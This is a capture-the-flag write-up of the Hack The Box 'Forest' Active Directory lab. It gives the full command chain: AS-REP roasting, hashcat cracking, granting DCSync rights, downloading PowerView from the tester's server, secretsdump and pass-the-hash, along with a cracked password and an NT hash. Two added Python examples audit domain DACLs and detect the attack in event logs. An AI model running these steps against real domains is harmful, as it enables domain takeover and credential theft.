Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124

Abuse WriteDACL to Perform DCSync
I started with an nmap scan:
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.3.218
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-13 19:13 CET
Nmap scan report for 10.129.3.218
Host is up (0.015s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-13 18:20:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-02-13T18:20:36
|_ start_date: 2026-02-13T18:17:33
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2026-02-13T10:20:35-08:00
|_clock-skew: mean: 2h46m51s, deviation: 4h37m08s, median: 6m50s
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 21.08 seconds
The SMB discovery script returned the domain: htb.local
The question is a bit tricky because the majority of these services allow anonymous authentication, but only one can provide valuable information about the machine: LDAP.
I first tried to enumerate shares; however, it was not possible. I then searched about LDAP enumeration and found this.
I then tried an anonymous bind (no authentication):
ldapsearch -x -H ldap://target.com -b "dc=htb,dc=local"
I lost about half an hour trying to get a user with Pre-Authentication disabled. I moved from LDAP enumeration to rpcclient enumeration using the following command:
┌──(kali㉿kali)-[~/Desktop]
└─$ rpcclient -U "" -N 10.129.3.218
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
I then cleaned the results and got the list of users:
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
I then used the Impacket script GetNPUsers.py that will search for users that have the property ‘Do not require Kerberos preauthentication’:
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.129.3.218 -no-pass -usersfile users.txt
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:0a78d7f4f1f41b2ae0e875dc8c02a91b$ea21627b232b9c399e1db4a596186b0ff2fcc5689541a90edc01b80b631ff47b00fc0d96e16cc43cfe31b2dbd4d4740eeffee4d8eabf38693a8abb11aa9de7f357293c0fe658681cd9dd86e24c1b3bd36c3a13b0bc7e4b25e2d8bbf42193854bb61257a64b677090f0008a333cb91b38df1e24597019aa025cbd8ce632473096dea71bd54830b4aa14d7ba40bfbb0cde773c41fcb9c0cc6c1edd696c3221bc04b34d213a7b27ccd6045e69b061eb2ce0f04ce9ab558a55a4648a3d5d0a9f20f604846b581a50b2f6f33751f0d85535683f6a0baf7f307e66970d1632a53b51d5f0ef22b14b85
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
And the user is svc-alfresco
I brute-forced it using hashcat and rockyou.txt:
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
The result is s3rvice
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --show
[email protected]:0a78d7f4f1f41b2ae0e875dc8c02a91b$ea21627b232b9c399e1db4a596186b0ff2fcc5689541a90edc01b80b631ff47b00fc0d96e16cc43cfe31b2dbd4d4740eeffee4d8eabf38693a8abb11aa9de7f357293c0fe658681cd9dd86e24c1b3bd36c3a13b0bc7e4b25e2d8bbf42193854bb61257a64b677090f0008a333cb91b38df1e24597019aa025cbd8ce632473096dea71bd54830b4aa14d7ba40bfbb0cde773c41fcb9c0cc6c1edd696c3221bc04b34d213a7b27ccd6045e69b061eb2ce0f04ce9ab558a55a4648a3d5d0a9f20f604846b581a50b2f6f33751f0d85535683f6a0baf7f307e66970d1632a53b51d5f0ef22b14b85:s3rvice
We have port 5985 open, which is used for WinRM over HTTP. We can hence use evil-winrm to get a shell:

I directly thought about BloodHound. I will try bloodhound-python on Kali Linux:
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -u svc-alfresco -p 's3rvice' -d htb.local -ns 10.129.3.218 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (FOREST.htb.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
INFO: Done in 00M 08S
I then started neo4j:
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo neo4j start
[sudo] password for kali:
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:58633). It is available at <http://localhost:7474>
There may be a short delay until the server is ready.
I then started the BloodHound GUI:
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound
Starting neo4j
Neo4j is running at pid 58633
Bloodhound will start
IMPORTANT: It will take time, please wait...
{"time":"2026-02-13T21:11:19.399708881+01:00","level":"INFO","message":"Reading configuration found at /etc/bhapi/bhapi.json"}
{"time":"2026-02-13T21:11:19.402964088+01:00","level":"INFO","message":"Logging configured"}
{"time":"2026-02-13T21:11:19.495424975+01:00","level":"INFO","message":"No database driver has been set for migration, using: neo4j"}
{"time":"2026-02-13T21:11:19.496503157+01:00","level":"INFO","message":"Connecting to graph using Neo4j"}
{"time":"2026-02-13T21:11:19.49829207+01:00","level":"INFO","message":"Starting daemon Tools API"}
{"time":"2026-02-13T21:11:19.543103357+01:00","level":"INFO","message":"No new SQL migrations to run"}
{"time":"2026-02-13T21:11:19.662812722+01:00","level":"ERROR","message":"Error generating AzureHound manifest file: error reading downloads directory /etc/bloodhound/collectors/azurehound: open /etc/bloodhound/collectors/azurehound: no such file or directory"}
{"time":"2026-02-13T21:11:19.662914851+01:00","level":"ERROR","message":"Error generating SharpHound manifest file: error reading downloads directory /etc/bloodhound/collectors/sharphound: open /etc/bloodhound/collectors/sharphound: no such file or directory"}
{"time":"2026-02-13T21:11:19.693272132+01:00","level":"INFO","message":"Analysis requested by init"}
{"time":"2026-02-13T21:11:19.701225176+01:00","level":"INFO","message":"Starting daemon API Daemon"}
{"time":"2026-02-13T21:11:19.701397813+01:00","level":"INFO","message":"Starting daemon Data Pruning Daemon"}
{"time":"2026-02-13T21:11:19.701455284+01:00","level":"INFO","message":"Starting daemon Data Pipe Daemon"}
{"time":"2026-02-13T21:11:19.701464423+01:00","level":"INFO","message":"Server started successfully"}
{"time":"2026-02-13T21:11:19.710668454+01:00","level":"INFO","message":"Running OrphanFileSweeper for path /var/lib/bhe/work/tmp"}
{"time":"2026-02-13T21:11:20.263832891+01:00","level":"INFO","message":"GET /","proto":"HTTP/1.1","referer":"","user_agent":"curl/8.17.0","request_bytes":0,"response_bytes":38,"status":301,"elapsed":1.941692,"request_id":"5700cbb1-f4af-42e8-9642-83d34c9992a2","request_ip":"127.0.0.1","remote_addr":"127.0.0.1:40996"}
opening <http://127.0.0.1:8080>
I then uploaded the JSON results to BloodHound and used this query:
MATCH (g)-[r:WriteDacl]->(d:Domain {name:"HTB.LOCAL"})
RETURN g,r,d
I got 3 groups that have WriteDACL on the HTB.LOCAL domain

The answer is Exchange Windows Permissions
WriteDACL → Add DCSync → secretsdump
I expanded Inbound Object Control of Exchange Windows Permissions and found that svc-alfresco is a member of Account Operators
If a group has WriteDACL on the domain object, members of that group can:
➡ modify the domain ACL
➡ grant themselves DCSync rights
➡ perform full domain compromise
Typical attack path:
We can have more information here about WriteDACL
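The defensive counterpart to this path is a review of who holds WriteDACL or the replication rights on the domain object. The following added example (not from the original post) parses a domain-head security descriptor in SDDL form, as returned for instance by `(Get-Acl "AD:DC=htb,DC=local").Sddl`, and reports unexpected trustees; the SDDL string, the SIDs and the expected-trustee list are constructed assumptions.

```python
import re
from collections import defaultdict

# Replication extended rights (rightsGuid values from the AD schema).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
DCSYNC_PAIR = set(REPL_RIGHTS.values())
# Assumption: trustees expected to hold these rights (SDDL aliases); tune per domain.
EXPECTED = frozenset({"SY", "BA", "DA", "EA", "ED", "DD", "RO"})
HEX_BITS = {0x10000000: "GA", 0x00040000: "WD", 0x00000100: "CR"}
ACE_RE = re.compile(r"\(" + ";".join([r"([^;()]*)"] * 6) + r"\)")


def pairs(field):
    """Split an SDDL flag or rights field into its two-letter codes."""
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def rights_of(field):
    """Rights appear either as two-letter codes or as a hex access mask."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {code for bit, code in HEX_BITS.items() if mask & bit}
    return pairs(field)


def audit_domain_dacl(sddl, expected=EXPECTED):
    """Return sorted (trustee, finding) pairs for unexpected allow ACEs."""
    findings, repl = set(), defaultdict(set)
    for ace_type, flags, rights, obj, _inherit, trustee in ACE_RE.findall(sddl):
        if ace_type not in ("A", "OA") or trustee in expected:
            continue  # deny and audit ACEs are out of scope here
        if "IO" in pairs(flags):
            continue  # inherit-only: does not apply to the domain object itself
        codes, obj = rights_of(rights), obj.lower()
        if not obj and codes & {"WD", "GA"}:
            findings.add((trustee, "WriteDACL"))
        if not obj and codes & {"CR", "GA"}:
            repl[trustee] |= DCSYNC_PAIR  # all extended rights
        elif "CR" in codes and obj in REPL_RIGHTS:
            repl[trustee].add(REPL_RIGHTS[obj])
    findings |= {(t, "DCSync") for t, names in repl.items() if DCSYNC_PAIR <= names}
    return sorted(findings)


DOM = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
GC, GCA = REPL_RIGHTS  # the two GUID strings, in insertion order
SAMPLE_SDDL = (  # constructed descriptor, not taken from the lab domain
    "O:DAG:DAD:AI"
    "(A;;RPWPCRCCLCLORCWOWDSDSW;;;DA)"
    f"(OA;;CR;{GC};;ED)(OA;;CR;{GCA};;DD)"
    f"(A;CI;WD;;;{DOM}-1601)"         # effective WriteDACL for a custom group
    f"(A;CIIO;0x40000;;;{DOM}-1602)"  # same right, but inherit-only
    f"(OA;;CR;{GC};;{DOM}-1603)(OA;;CR;{GCA};;{DOM}-1603)"  # both rights
    f"(OA;;CR;{GC};;{DOM}-1604)"      # only one right of the pair
)

if __name__ == "__main__":
    for trustee, finding in audit_domain_dacl(SAMPLE_SDDL):
        print(f"{finding:10} {trustee}")
```

A group that legitimately needs one of these rights can be added to the `expected` set by SID so that later runs only report drift.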
I will try to add svc-alfresco to Exchange Windows Permissions since he is a member of Account Operators and then I will try DCSync:
I first added the user svc-alfresco to Exchange Windows Permissions using the following PS Command:
Add-ADGroupMember -Identity "Exchange Windows Permissions" -Members svc-alfresco
I then verified he was added using the following command:
Get-ADGroupMember "Exchange Windows Permissions"

Before doing so, let’s transfer PowerView.ps1. For this, I created a Python server on port 4444:
python3 -m http.server 4444
I then downloaded it using the following command:
Invoke-WebRequest -Uri "http://10.10.15.41:4444/PowerView.ps1" -OutFile "PowerView.ps1"

I was stuck somewhere so, based on the writeup, I created a new user john and gave it DCSync rights:
$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList 'htb\john', $pass
Add-ObjectACL -PrincipalIdentity john -Credential $cred -Rights DCSync
I then dumped the hashes using secretsdump.py from my Kali machine:
┌──(kali㉿kali)-[~/Desktop/Abdallah/Tools]
└─$ ./secretsdump.py htb.local/john:'abc123!'@10.129.2.75
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Kerberos keys grabbed
[*] Cleaning up...
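The AS-REP request for svc-alfresco and the DRSUAPI replication shown above both leave traces in the domain controller's Security log when Kerberos authentication and Directory Service Access auditing are enabled. This added example (not part of the original post) runs two detection rules over constructed, simplified 4768 and 4662 events; the event dictionaries and the allowlist of replication accounts are assumptions.

```python
import re
from collections import defaultdict

# Replication extended rights (rightsGuid values from the AD schema).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")


def tgt_without_preauth(events):
    """4768: accounts issued a TGT with PreAuthType 0, grouped by client."""
    by_source = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4768 or ev.get("Status") != "0x0":
            continue  # keep successful AS exchanges only
        if ev.get("PreAuthType") != "0":
            continue
        ip = ev.get("IpAddress", "")
        if ip.lower().startswith("::ffff:"):
            ip = ip[7:]  # IPv4 clients are logged as IPv4-mapped IPv6
        by_source[ip].add(ev.get("TargetUserName", ""))
    return {ip: sorted(users) for ip, users in by_source.items()}


def replication_by_non_dc(events, replication_accounts):
    """4662: replication rights used by accounts outside the allowlist."""
    allowed = {a.lower() for a in replication_accounts}
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & 0x100:
            continue  # 0x100 = Control Access (extended right)
        who = ev.get("SubjectUserName", "")
        if who.lower() in allowed:
            continue
        for guid in GUID_RE.findall(ev.get("Properties", "")):
            if guid.lower() in REPL_GUIDS:
                hits[who].add(REPL_GUIDS[guid.lower()])
    return {who: sorted(names) for who, names in hits.items()}


# Constructed events (field subsets only), using account names from the page.
GC, GCA = ("{%s}" % g for g in REPL_GUIDS)
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "Status": "0x0",
     "PreAuthType": "0", "IpAddress": "::ffff:10.10.15.41"},
    {"EventID": 4768, "TargetUserName": "sebastien", "Status": "0x0",
     "PreAuthType": "2", "IpAddress": "::ffff:10.10.15.41"},
    {"EventID": 4768, "TargetUserName": "Guest", "Status": "0x12",
     "PreAuthType": "0", "IpAddress": "::ffff:10.10.15.41"},
    {"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100",
     "Properties": "%%7688 " + GC},
    {"EventID": 4662, "SubjectUserName": "john", "AccessMask": "0x100",
     "Properties": "%%7688 " + GC},
    {"EventID": 4662, "SubjectUserName": "john", "AccessMask": "0x100",
     "Properties": "%%7688 " + GCA},
    {"EventID": 4662, "SubjectUserName": "EXCH01$", "AccessMask": "0x10",
     "Properties": "%%7684 " + GC},
]
```

The allowlist should name the domain controller machine accounts and any directory synchronisation service account explicitly, since a `$` suffix alone would also exempt member servers such as EXCH01$.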
I then passed the hash using the following command:
evil-winrm -i 10.129.2.75 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
And got admin shell and got the flag:
